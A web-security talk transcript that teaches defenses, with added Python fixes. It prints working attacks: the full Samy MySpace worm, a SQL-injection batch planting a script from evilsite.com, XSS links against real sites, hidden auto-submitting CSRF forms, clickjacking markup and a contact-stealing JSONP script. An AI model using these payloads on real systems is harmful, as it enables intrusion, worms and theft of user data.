Unblocking The Main Thread Solving ANRs and Frozen Frames
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Ā 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
Ā 

Web Security Horror Stories

  • 1. Web Security Horror Stories: The Director’s Cut. Simon Willison, 26th October 2008
  • 2. The edited version • On Friday, I spent 15 minutes introducing: • XSS • CSRF / login CSRF • SQL injection • Clickjacking • I promised this talk would provide fixes
  • 3. XSS • Cross-site scripting • Attacker injects JavaScript code into your site • Amazingly common • A single XSS hole on your domain compromises your security, entirely
  • 4. Alex Russell: If you are subject to an XSS, the same domain policy already ensures that you’re f’d. An XSS attack is the “root” or “ring 0” attack of the web. http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-film-at-11/
  • 5. The same origin policy • “The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.” https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
  • 6. Why? • Without the same origin policy, I could load your site in a frame, iframe or popup window from my site... • ... and steal data from it • ... or rewrite it with my own modifications • evil.hax.ru should not be able to read secret-wiki.bigco.intl • XMLHttpRequest has the same policy
  • 7. Things I can do if you have an XSS hole • Steal your users’ cookies and log in as them • Show a fake phishing login page on your site • Embed malware and drive-by downloads • Perform any action as if I was your user
  • 8. Two categories of XSS • Reflected • I embed my JS in a link to your site and trick your user into following it • Persistent • I get my XSS into your site’s database somehow so that it shows up on your pages
  • 9. http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script> http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%20src=http://ckers.org/s%3E http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/thread/1ab38554971acfc9')&+eval(alert(document.cookie))&+eval('?tvc=2 http://search.live.com/images/results.aspx?q=1&first=21&FORM=PEIR"><script>alert('securitylab.ru')</script> All from http://xssed.com/
  • 10.
  • 13. If you’re gluing SQL strings together with string appends,
  • 14. • Wrong: • $sql = "select * from users where username = '" . $username . "'"; • Right: • $results = db_query("select * from users where username = ?", $username);
  • 15. Mass XSS via SQL injection DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; http://hackademix.net/2008/04/26/mass-attack-faq/
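An added, runnable version of the Wrong and Right patterns from slide 14, written here in Python against an in-memory SQLite database rather than the talk's PHP (it is not code from the slides; make_db, the sample users and the payloads are constructed for the demonstration). The last function tries the stacked-statement form used by the mass attack on slide 15, to show that a driver refusing a second statement is no defence.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with a few sample users (not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, is_admin) VALUES (?, ?)",
        [("alice", 1), ("bob", 0), ("carol", 0)],
    )
    return conn


def find_user_unsafe(conn, username):
    """Slide 14, Wrong: the value is spliced into the SQL text, so a quote in the
    input ends the string literal and whatever follows is parsed as SQL."""
    sql = "select * from users where username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Slide 14, Right: the query carries a placeholder and the value travels
    separately, so the input can only ever be data, never SQL."""
    sql = "select * from users where username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Run both forms with a tautology payload; returns (rows_unsafe, rows_safe)."""
    conn = make_db()
    payload = "nobody' OR '1'='1"       # closes the literal, appends OR '1'='1
    unsafe_rows = find_user_unsafe(conn, payload)   # every user comes back
    safe_rows = find_user_safe(conn, payload)       # nobody has that literal name
    return len(unsafe_rows), len(safe_rows)


def stacked_statement(conn):
    """The mass attack on slide 15 appended a whole T-SQL batch after the
    injected quote and SQL Server ran it. Python's sqlite3 driver refuses more
    than one statement per execute(), so the table survives here, but the
    tautology in demo() still works against it: the driver is not the defence,
    the placeholder is. Returns True if the users table still exists."""
    try:
        find_user_unsafe(conn, "x'; DROP TABLE users; --")
    except (sqlite3.Warning, sqlite3.Error):
        pass
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"
    ).fetchall()
    return ("users",) in tables


if __name__ == "__main__":
    print(demo())                       # (3, 0)
    print(stacked_statement(make_db()))  # True
```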
  • 16. Preventing XSS • Use a tool that escapes everything on output • Only unescape stuff that you know is safe and you know contains markup you want to execute • IE 8 has an XSS filter; this is irrelevant to developers • httpOnly cookies are mostly a waste of time
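An added Python sketch of the first two bullets on slide 16 (not code from the talk or from any particular template engine): every value is escaped on output, and the only way markup gets through unescaped is by being wrapped in a SafeHTML marker on purpose. SafeHTML, escape, render_profile and the inputs in demo are this example's own.

```python
import html


class SafeHTML(str):
    """Markup that has already been escaped or sanitised. The only way markup
    reaches the output unescaped is by being wrapped in this deliberately."""


def escape(value):
    """Escape on output by default; pass through only what was marked safe."""
    if isinstance(value, SafeHTML):
        return str(value)
    # quote=True also escapes " and ', so the result is safe inside a quoted attribute
    return html.escape(str(value), quote=True)


def render_profile(display_name, bio):
    """A tiny template: the name lands in an attribute and in element text and
    both go through escape(); the bio is only trusted if it is SafeHTML."""
    return (
        f'<h1 title="{escape(display_name)}">{escape(display_name)}</h1>'
        f'<div class="bio">{escape(bio)}</div>'
    )


def demo():
    # Constructed inputs: a reflected-XSS style name, and the same bio markup
    # once as an untrusted string and once marked safe (e.g. after sanitising).
    name = '"><script>alert(document.cookie)</script>'
    untrusted_bio = "<b>hello</b>"
    trusted_bio = SafeHTML("<b>hello</b>")
    return render_profile(name, untrusted_bio), render_profile(name, trusted_bio)


if __name__ == "__main__":
    for page in demo():
        print(page)
```

html.escape with quote=True covers element text and quoted attribute values; a value going into a JavaScript string, a URL or a CSS property needs its own escaping rules, which this does not attempt.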
  • 17. HTML “sanitisation” • My users need to be able to add links and basic styles to their submissions • “I’ll let them use HTML and remove anything nasty” • An extremely common vector for XSS • MySpace • LiveJournal • Almost anyone else who tries
  • 18. <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="
var B=String.fromCharCode(34);var A=String.fromCharCode(39);
function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}
function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}
function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}
var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];
if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}
function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}
function nothing(){}
function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}
function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}
function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}
function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}
function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}
function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}
var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;
if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}
var AG;
function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}
function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}
function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}
"></DIV>
  • 19. samy is my hero http://namb.la/popular/
  • 20. A social network worm • XSS hole in MySpace’s HTML filter • When you viewed Samy’s profile... • JS makes you add him as a friend • JS uses XMLHttpRequest to add his exploit to YOUR profile as well
  • 21. 20 hours, 1,005,831 friend requests (then MySpace crashed)
  • 22. (the worm source from slide 18, shown again in full)
  • 23. <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="..."> eval('document.body.inne' + 'rHTML'); eval('xmlhttp.onread' + 'ystatechange = callback'); http://namb.la/popular/tech.html
  • 24. Things to remember • Whitelist, don’t blacklist • You’re programming against undocumented parsing routines in closed-source browsers • Distrust any library that doesn’t have a unit test suite a mile long • http://ha.ckers.org/xss.html • http://code.google.com/p/html5lib/ is promising
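An added example of the whitelist approach slides 17 to 24 argue for, written here in Python on the standard library's html.parser (it is not code from the talk, from MySpace or from html5lib). The tag and attribute lists, safe_href and the WhitelistSanitiser class are this example's own; the inputs in the usage below, including a cut-down version of the Samy div, are constructed.

```python
import re
from html import escape
from html.parser import HTMLParser

# Policy: an explicit list of what is allowed. Anything not listed is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style=, no id=, no on*= handlers
ALLOWED_SCHEMES = {"http", "https"}
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style"}  # dropped together with their contents

# Browsers ignore control characters and whitespace inside a URL scheme, which
# is how "java\nscript:" got past MySpace's blacklist. Remove them before checking.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")


def safe_href(value):
    """Return the href if it is relative or its scheme is allowed, else None."""
    cleaned = _CONTROL.sub("", value or "")
    match = _SCHEME.match(cleaned)
    if match is None:
        return cleaned                   # no scheme at all: a relative URL
    return cleaned if match.group(1).lower() in ALLOWED_SCHEMES else None


class WhitelistSanitiser(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: text and attribute values arrive decoded, so
        # "&#106;avascript:" is seen as "javascript:" and cannot hide.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []              # allowed tags emitted so far, for closing
        self.skipping = 0                # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skipping += 1
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return                       # unknown tag: drop it, keep its text
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                 # every attribute not listed is dropped
            if name == "href":
                value = safe_href(value)
                if value is None:
                    continue             # bad scheme: drop the attribute
            attr_value = escape(value or "", quote=True)
            kept += f' {name}="{attr_value}"'
        self.out.append(f"<{tag}{kept}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skipping = max(0, self.skipping - 1)
            return
        if tag not in self.open_tags:
            return                       # stray or disallowed close tag
        while self.open_tags:            # close mis-nested tags in order
            opened = self.open_tags.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()                     # flush any text the parser buffered
        while self.open_tags:            # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitise(untrusted_html):
    parser = WhitelistSanitiser()
    parser.feed(untrusted_html)
    return parser.result()


if __name__ == "__main__":
    # Constructed inputs: a cut-down Samy div, and an entity-encoded javascript: link
    samy = "<div id=mycode style=\"BACKGROUND: url('java\nscript:eval(1)')\" expr=\"x\">hi</div>"
    print(sanitise(samy))                                        # hi
    print(sanitise('<a href="&#106;avascript:alert(1)">x</a>'))  # <a>x</a>
```

Everything unknown is dropped rather than matched against a list of bad things, so style=, expr= and on*= never reach the output; href is the one kept attribute whose value the browser interprets, so it is the one that gets a scheme check, done after stripping the control characters browsers ignore. html.parser is not a browser-grade parser, which is exactly the slide's warning; the whitelist is what keeps the output safe, because whatever the parser did not recognise is dropped rather than passed along, and the contents of script and style are discarded rather than shown as text.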
  • 26. The UTF-7 hole
    • Google's 404 pages used to be served without a character set specified in the HTTP headers or <head> section
    • Without those hints, IE inspects the first 4096 bytes to "guess" which encoding is used
    • XSS attacks encoded as UTF-7 were shown on the page and executed by IE
    http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
  • 27. You can't trust CSS either
    • Want to let your users include their own stylesheet?
    • HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks
    • LiveJournal were attacked with this
    • A "position: absolute" hack was used to steal 30,000 MySpace passwords last year
    http://community.livejournal.com/lj_dev/708069.html
    http://www.securiteam.com/securitynews/6O00M0AHFW.html
  • 28. CSRF
  • 29. Bill Zeller: "We've found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If you're in charge of a website and haven't specifically protected against CSRF, chances are you're vulnerable"
  • 30. The Google Web Accelerator
  • 31. How does it work?
    • It pre-fetches the links on a page into a cache, so they're already loaded when you click on them
    • Links like http://app.example.com/delete.php?id=5
  • 34. That's also a security hole
      <img src="http://app.example.com/delete.php?id=1">
      <img src="http://app.example.com/delete.php?id=2">
      <img src="http://app.example.com/delete.php?id=3">
      <img src="http://app.example.com/delete.php?id=4">
      <img src="http://app.example.com/delete.php?id=5">
      <img src="http://app.example.com/delete.php?id=6">
      <img src="http://app.example.com/delete.php?id=7">
      <img src="http://app.example.com/delete.php?id=8">
      ...
  • 35. So use POST ā€¢ You can't create a page that automatically posts to another site, can you?
  • 36. POST will not save you
      <form action="http://app.example.com/delete.php" method="POST">
        <input type="hidden" name="id" value="1">
        <input type="submit" value="More kittens please!">
      </form>
    fofurasfelinas: http://www.flickr.com/photos/fofurasfelinas/9724483/
  • 37. Or do it with JavaScript
      <div style="display: none">
        <form action="http://app.example.com/delete.php" method="POST">
          <input type="hidden" name="id" value="1">
        </form>
      </div>
      <script>document.forms[0].submit()</script>
    Put this in a hidden iframe and your victim won't even know it happened.
  • 38. The Digg exploit
    • A few years ago, Digg had no CSRF protection on their "digg this" button
    • Self-digging pages!
    http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
  • 39. The Gmail filter hack
    http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
  • 40. "We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution."
    http://www.freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks
  • 41. Preventing CSRF
    • You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site
    • Referrer checking is notoriously unreliable
    • Solution: include a form token (Yahoo! calls this a "crumb") proving that the post came from your site
  • 42. Crumbs
      <form action="http://app.example.com/delete.php" method="POST">
        <input type="hidden" name="id" value="37">
        <input type="hidden" name="crumb" value="856c2f50ddc49fd710f14a406ec1fef652d3c9f">
        <input type="submit" value="Delete this item">
      </form>
  • 43. Crumbs
    • Should be unique per user (or one user can use their crumb to attack another)
    • Hence should be tied to the user's session or login cookie
    • Should be changed over time
    • Quick and dirty: use sha1(salt + user's session ID + timestamp) as the crumb
  • 44. Protecting the crumb
    • Your crumb is now the only thing protecting you from CSRF attacks
    • This is why XSS is "ring 0" for the Web
    • With XSS, I can steal your crumb and run riot across your site
    • XSS holes are automatically CSRF holes
  • 45. Crumbs and Ajax
    • Ajax can set HTTP headers; regular forms can't
    • Ajax requests must be from the same domain
    • So X-Requested-By: XMLHttpRequest can only come from your own site
    • You can skip your crumb checking for requests that include that custom header
  • 46. Login CSRF
    • Most login forms skip CSRF protection
    • Create a throw-away PayPal account
    • Use CSRF to log someone in as "you"
    • Hope that they add their credit card or bank details
    • Log in later and steal all of their money!
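The crumb scheme from slides 41 to 46, as an added example rather than code from the talk or from Yahoo!: a token tied to the session cookie, rotated hourly with a one-bucket grace period, and a request check that applies slide 45's Ajax header exemption. It goes slightly beyond slide 43's sha1(salt + session ID + timestamp) by using a keyed HMAC with a constant-time compare, which is the same idea done properly. The request dict shape, SECRET_KEY and the cookie name are assumptions of this example, not any framework's API; protecting the login form works the same way, with the anonymous pre-login session ID in place of the logged-in one.

```python
"""Per-session, time-rotating CSRF crumb (added example, not from the slides).

Assumptions: SECRET_KEY is a server-side secret (the slides' "salt");
a request is a plain dict {"method", "cookies", "form", "headers"}; the
session cookie is called "session" and exists before login too, so the
login form (slide 46) gets the same protection.
"""
import hashlib
import hmac
import time

SECRET_KEY = b"constructed-secret-replace-in-production"
ROTATE_SECONDS = 3600     # crumb changes every hour (slide 43: "changed over time")
GRACE_BUCKETS = 1         # the previous hour's crumb is still accepted


def _bucket(now=None):
    """Integer time bucket embedded in the crumb so it expires."""
    now = time.time() if now is None else now
    return int(now // ROTATE_SECONDS)


def _mac(session_id, bucket):
    msg = f"{session_id}:{bucket}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def make_crumb(session_id, now=None):
    """Return 'bucket:mac'; unique per session, so one user's crumb is
    useless against another (slide 43)."""
    b = _bucket(now)
    return f"{b}:{_mac(session_id, b)}"


def check_crumb(session_id, crumb, now=None):
    """True iff crumb was minted for this session in the current or a
    recent bucket. compare_digest avoids leaking the MAC byte by byte."""
    try:
        bucket_str, mac = crumb.split(":", 1)
        bucket = int(bucket_str)
    except (AttributeError, ValueError):
        return False
    current = _bucket(now)
    if not (current - GRACE_BUCKETS <= bucket <= current):
        return False
    return hmac.compare_digest(_mac(session_id, bucket), mac)


def is_request_allowed(request, now=None):
    """Gate for a state-changing handler such as delete.php.

    Only POST is accepted (slides 31-35: never change state on GET). A
    request carrying the custom header from slide 45 is taken as same-origin
    Ajax; note slide 61's caveat that a Flash applet can forge such headers,
    so that exemption is a deliberate trade-off. Everything else must carry
    a crumb that matches the request's own session cookie."""
    if request.get("method") != "POST":
        return False
    if request.get("headers", {}).get("X-Requested-By") == "XMLHttpRequest":
        return True
    session_id = request.get("cookies", {}).get("session")
    crumb = request.get("form", {}).get("crumb")
    if not session_id or not crumb:
        return False
    return check_crumb(session_id, crumb, now)


if __name__ == "__main__":
    sid = "constructed-session-abc123"
    # the form from slide 42, rendered for this session
    genuine = {"method": "POST", "cookies": {"session": sid},
               "form": {"id": "37", "crumb": make_crumb(sid)}, "headers": {}}
    # the hidden form from slide 37: the browser sends the cookie, but the
    # attacker's page cannot know the crumb
    forged = {"method": "POST", "cookies": {"session": sid},
              "form": {"id": "1"}, "headers": {}}
    print(is_request_allowed(genuine), is_request_allowed(forged))  # True False
```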
  • 49. iframe !
  • 55. <style type="text/css">
        iframe {
          width: 400px;
          height: 200px;
          position: absolute;
          top: 10px;
          left: 10px;
          overflow: hidden;
          opacity: 0;
        }
        #decoy { ... }
      </style>
      <iframe src="http://veryimportantapp.com/delete-account/"></iframe>
      <p id="decoy">Click HERE for kittens!</p>
  • 56. Frame-busting
      <script type="text/javascript">
      if (top.location != location) {
        top.location.href = document.location.href;
      }
      </script>
    • Ironically, turning off JavaScript in your browser makes you less safe here
  • 60. The problem with plugins
  • 61. crossdomain.xml
      <cross-domain-policy>
        <allow-access-from domain="*" />
      </cross-domain-policy>
    Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs
    Flash can even fake an X-Requested-With: XMLHttpRequest header
    That's why Flickr use api.flickr.com/crossdomain.xml instead
  • 63. Nasty crossdomain.xml tricks
      loadPolicyFile("http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xml")
      00000000  47 49 46 38 39 61 01 01-01 01 e7 e9 20 3c 63 72  GIF89a.......<cr
      00000010  6f 73 73 2d 64 6f 6d 61-69 6e 2d 70 6f 6c 69 63  oss-domain-polic
      00000020  79 3e 0a 20 20 3c 61 6c-6c 6f 77 2d 61 63 63 65  y>...<allow-acce
      00000030  73 73 2d 66 72 6f 6d 20-64 6f 6d 61 69 6e 3d 22  ss-from domain="
      00000040  2a 22 2f 3e 20 0a 20 20-3c 2f 63 72 6f 73 73 2d  *"/>....</cross-
      00000050  64 6f 6d 61 69 6e 2d 70-6f 6c 69 63 79 3e 47 49  domain-policy>..
    http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html
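A small linter for a Flash crossdomain.xml, added here as an example (not code from the talk, Flickr or Adobe) covering slides 61 and 63: it flags the wildcard policy from slide 61, an explicit secure="false", and a master policy that does not pin permitted-cross-domain-policies to master-only, which is the setting that stops the player from honouring a policy smuggled inside an uploaded GIF as on slide 63. The two policy documents and the GIF sample are constructed for this example; the hardened one assumes the API is on its own host, which is the api.flickr.com approach the slide mentions.

```python
"""Lint a Flash crossdomain.xml before publishing it (added example)."""
import xml.etree.ElementTree as ET

# Slide 61's policy: any Flash applet on any site may read example.com
WEAK_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed hardened policy for a separate API host: explicit origins,
# HTTPS-only, and no alternative policy files accepted from other URLs.
STRICT_POLICY = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="widgets.example.com" secure="true" />
</cross-domain-policy>"""

# Constructed stand-in for slide 63's trick: a policy buried in image bytes
GIF_WITH_POLICY = ("GIF89a\x01\x01\x01\x01\xe7\xe9 <cross-domain-policy>\n"
                   '  <allow-access-from domain="*"/>\n</cross-domain-policy>')


def lint_crossdomain(policy_xml):
    """Return a list of findings; an empty list means nothing was flagged."""
    try:
        root = ET.fromstring(policy_xml)
    except ET.ParseError as exc:
        # A strict XML parser rejects it; Flash's lenient one historically did not,
        # which is exactly why master-only matters on the real master file.
        return [f"not well-formed XML ({exc})"]
    if root.tag != "cross-domain-policy":
        return [f"unexpected root element <{root.tag}>"]

    findings = []
    site_control = root.find("site-control")
    mode = (site_control.get("permitted-cross-domain-policies")
            if site_control is not None else None)
    if mode != "master-only":
        findings.append('permitted-cross-domain-policies is not "master-only": '
                        "a policy file served from any other URL on this host "
                        "(e.g. an uploaded image) could be honoured")

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": every site can read '
                            "responses, and your crumbs, through Flash")
        elif domain.startswith("*."):
            findings.append(f"wildcard rule {domain!r}: every subdomain, "
                            "including user-controlled ones, is trusted")
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" on {domain!r}: plain-HTTP origins '
                            "may read HTTPS content")
    return findings


if __name__ == "__main__":
    for name, doc in [("weak", WEAK_POLICY), ("strict", STRICT_POLICY),
                      ("gif", GIF_WITH_POLICY)]:
        print(name, lint_crossdomain(doc) or "ok")
```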
  • 64. The PDF hole
    • In January 2007, an XSS hole was found in the Adobe PDF reader itself
    • It could execute JavaScript in the context of the current domain
    • Any sites hosting .pdf files for download were vulnerable
    http://shiflett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
  • 65. You can't secure your site 100%, because there's always a chance a browser or plugin will screw things up for you
  • 67. JSONP rocks!
    • http://json-tinyurl.appspot.com/
    • http://json-time.appspot.com/
    • http://json-head.appspot.com/
    http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo
      foo({"tinyurl": "http://tinyurl.com/kotu", "ok": true})
  • 68.
    • JSONP lets you opt-in to sharing your site's data with other sites using JavaScript
    • ... so make sure it's data you want to share
  • 69. Stealing Google contacts
      <script>
      function google(a){
        var emails;
        for(i=1;i<a.Body.Contacts.length;i++){
          alert(a.Body.Contacts[i].Email);
        }
        emails = "</ol>"
        document.write(emails);
      }
      </script>
      <script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">
      </script>
    http://blog.adamjacobmuller.com/gmail.txt
    http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
  • 70. Jeremiah Grossman: "If any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at risk"
    http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
  • 71. Regular JSON?
    • That's not secure either
    • In old versions of Firefox, you can redefine the Array constructor to grab the data
    • If your JSON object is an array, the data can be grabbed using <script src="your-data-here">
    http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
  • 72. Secure JSON
    Use { } as the root, not [ ]
    If you're paranoid about future similar problems, use an idiom like this one:
      while (true) {
        {"json": "goes here"}
      }
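Server-side helpers for slides 67 to 72, written as an added example (not code from the talk or from the appspot services it lists): render_json enforces the object root and wraps the document in slide 72's while(true) idiom, so loading it via <script src> parses as an infinite loop rather than as data; parse_guarded_json is what your own same-origin XHR code does to unwrap it; render_jsonp refuses to wrap anything flagged as user-sensitive at all, which is slide 68's "make sure it's data you want to share", and only accepts a callback name that is a plain identifier so the callback parameter cannot reflect markup into the response. The function names and the sensitive flag are this example's own.

```python
"""Secure JSON / JSONP rendering (added example, not from the slides)."""
import json
import re

GUARD_PREFIX = "while (true) { "
GUARD_SUFFIX = " }"
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*$")


def render_json(obj):
    """Slide 72: object root, never an array, plus the while(true) guard."""
    if not isinstance(obj, dict):
        raise TypeError("JSON root must be an object, not an array (slide 71)")
    return GUARD_PREFIX + json.dumps(obj) + GUARD_SUFFIX


def parse_guarded_json(text):
    """Counterpart for our own XHR handler: strip the guard, then parse."""
    if not (text.startswith(GUARD_PREFIX) and text.endswith(GUARD_SUFFIX)):
        raise ValueError("response is missing the while(true) guard")
    return json.loads(text[len(GUARD_PREFIX):-len(GUARD_SUFFIX)])


def render_jsonp(callback, obj, sensitive):
    """JSONP is an opt-in to cross-site sharing (slide 68). Per-user data
    must never be exposed this way (slides 69-70); public data may, with a
    callback restricted to a bare JavaScript identifier."""
    if sensitive:
        raise PermissionError("refusing JSONP for user-sensitive data")
    if not _CALLBACK_RE.match(callback):
        raise ValueError("callback must be a JavaScript identifier")
    return f"{callback}({json.dumps(obj)})"


if __name__ == "__main__":
    # slide 67's public tinyurl payload is fine to share
    print(render_jsonp("foo", {"tinyurl": "http://tinyurl.com/kotu", "ok": True}, sensitive=False))
    # a contact list (slide 69) gets the guarded, object-rooted form only
    doc = render_json({"contacts": [{"email": "alice@example.com"}]})  # constructed data
    print(doc)
    print(parse_guarded_json(doc))
```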
  • 73. And if that wasn't enough
    "More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found."
    http://news.bbc.co.uk/1/hi/technology/3639679.stm
    • We have a shared responsibility to teach people better online security behaviour
    • Don't teach our users to be phished!
  • 75. Stay informed!
    • http://planet-websecurity.org/feed/
    • http://www.owasp.org/
